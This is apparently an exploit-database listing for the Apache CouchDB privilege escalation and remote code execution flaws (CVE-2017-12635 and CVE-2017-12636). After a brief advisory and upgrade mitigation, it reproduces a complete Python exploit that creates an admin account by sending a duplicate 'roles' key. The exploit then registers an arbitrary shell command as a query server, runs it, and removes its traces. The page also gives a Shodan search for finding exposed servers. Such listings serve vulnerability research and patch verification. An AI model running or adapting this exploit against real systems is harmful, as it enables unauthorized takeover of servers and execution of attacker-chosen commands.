header-logo
Suggest Exploit
vendor:
CouchDB
by:
Cody Zacharias
7.2
CVSS
HIGH
Remote Code Execution
20
CWE
Product Name: CouchDB
Affected Version From: <= 1.7.0
Affected Version To: 2.x - 2.1.0
Patch Exists: YES
Related CWE: CVE-2017-12636
CPE: a:apache:couchdb
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-11769/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-8007/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2018-11769/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-12635/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2017-12636/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-12636/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2018-8007/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2017-12635/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=104697https://www.infosecmatter.com/nessus-plugin-library/?id=105943https://www.infosecmatter.com/nessus-plugin-library/?id=111018https://www.infosecmatter.com/nessus-plugin-library/?id=106208https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/apache_couchdb_cmd_exechttps://www.infosecmatter.com/nessus-plugin-library/?id=97419https://www.infosecmatter.com/nessus-plugin-library/?id=99128https://www.infosecmatter.com/list-of-metasploit-linux-exploits-detailed-spreadsheet/https://www.infosecmatter.com/nessus-plugin-library/?id=97191
Platforms Tested: Debian
2017

Apache CouchDB < 2.1.0 - Remote Code Execution

A vulnerability in Apache CouchDB allowed an attacker to execute arbitrary shell commands on the server. This vulnerability was caused by the lack of input validation in the configuration API. An attacker could send a specially crafted request to the configuration API and execute arbitrary shell commands on the server. This vulnerability affected versions <= 1.7.0 and 2.x - 2.1.0.

Mitigation:

Upgrade to Apache CouchDB version 2.1.1 or later.
Source

Exploit-DB raw data:

# Title: Apache CouchDB < 2.1.0 - Remote Code Execution
# Author: Cody Zacharias
# Shodan Dork: port:5984
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/
# Version: <= 1.7.0 and 2.x - 2.1.0
# Tested on: Debian
# CVE : CVE-2017-12636
# References: 
# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/

# Proof of Concept: python exploit.py --priv -c "id" http://localhost:5984

#!/usr/bin/env python
from requests.auth import HTTPBasicAuth
import argparse
import requests
import re
import sys

def getVersion():
    version = requests.get(args.host).json()["version"]
    return version

def error(message):
    print(message)
    sys.exit(1)

def exploit(version):
    with requests.session() as session:
        session.headers = {"Content-Type": "application/json"}

        # Exploit privilege escalation
        if args.priv:
            try:
                payload = '{"type": "user", "name": "'
                payload += args.user
                payload += '", "roles": ["_admin"], "roles": [],'
                payload += '"password": "' + args.password + '"}'

                pr = session.put(args.host + "/_users/org.couchdb.user:" + args.user,
                    data=payload)

                print("[+] User " + args.user + " with password " + args.password + " successfully created.")
            except requests.exceptions.HTTPError:
                error("[-] Unable to create the user on remote host.")

        session.auth = HTTPBasicAuth(args.user, args.password)

        # Create payload
        try:
            if version == 1:
                session.put(args.host + "/_config/query_servers/cmd",
                        data='"' + args.cmd + '"')
                print("[+] Created payload at: " + args.host + "/_config/query_servers/cmd")
            else:
                host = session.get(args.host + "/_membership").json()["all_nodes"][0]
                session.put(args.host + "/_node/" + host + "/_config/query_servers/cmd",
                        data='"' + args.cmd + '"')
                print("[+] Created payload at: " + args.host + "/_node/" + host + "/_config/query_servers/cmd")
        except requests.exceptions.HTTPError as e:
            error("[-] Unable to create command payload: " + e)

        try:
            session.put(args.host + "/god")
            session.put(args.host + "/god/zero", data='{"_id": "HTP"}')
        except requests.exceptions.HTTPError:
            error("[-] Unable to create database.")

        # Execute payload
        try:
            if version == 1:
                session.post(args.host + "/god/_temp_view?limit=10",
                        data='{"language": "cmd", "map": ""}')
            else:
                session.post(args.host + "/god/_design/zero",
                        data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
            print("[+] Command executed: " + args.cmd)
        except requests.exceptions.HTTPError:
            error("[-] Unable to execute payload.")

        print("[*] Cleaning up.")

        # Cleanup database
        try:
            session.delete(args.host + "/god")
        except requests.exceptions.HTTPError:
            error("[-] Unable to remove database.")

        # Cleanup payload
        try:
            if version == 1:
                session.delete(args.host + "/_config/query_servers/cmd")
            else:
                host = session.get(args.host + "/_membership").json()["all_nodes"][0]
                session.delete(args.host + "/_node" + host + "/_config/query_servers/cmd")
        except requests.exceptions.HTTPError:
            error("[-] Unable to remove payload.")

def main():
    version = getVersion()
    print("[*] Detected CouchDB Version " + version)
    vv = version.replace(".", "")
    v = int(version[0])
    if v == 1 and int(vv) <= 170:
        exploit(v)
    elif v == 2 and int(vv) < 211:
        exploit(v)
    else:
        print("[-] Version " + version + " not vulnerable.")
        sys.exit(0)

if __name__ == "__main__":
    ap = argparse.ArgumentParser(
            description="Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)")
    ap.add_argument("host", help="URL (Example: http://127.0.0.1:5984).")
    ap.add_argument("-c", "--cmd", help="Command to run.")
    ap.add_argument("--priv", help="Exploit privilege escalation (CVE-2017-12635).",
        action="store_true")
    ap.add_argument("-u", "--user", help="Admin username (Default: guest).",
            default="guest")
    ap.add_argument("-p", "--password", help="Admin password (Default: guest).",
            default="guest")
    args = ap.parse_args()
    main()

Navigation

Suggest Exploit

Services By CQR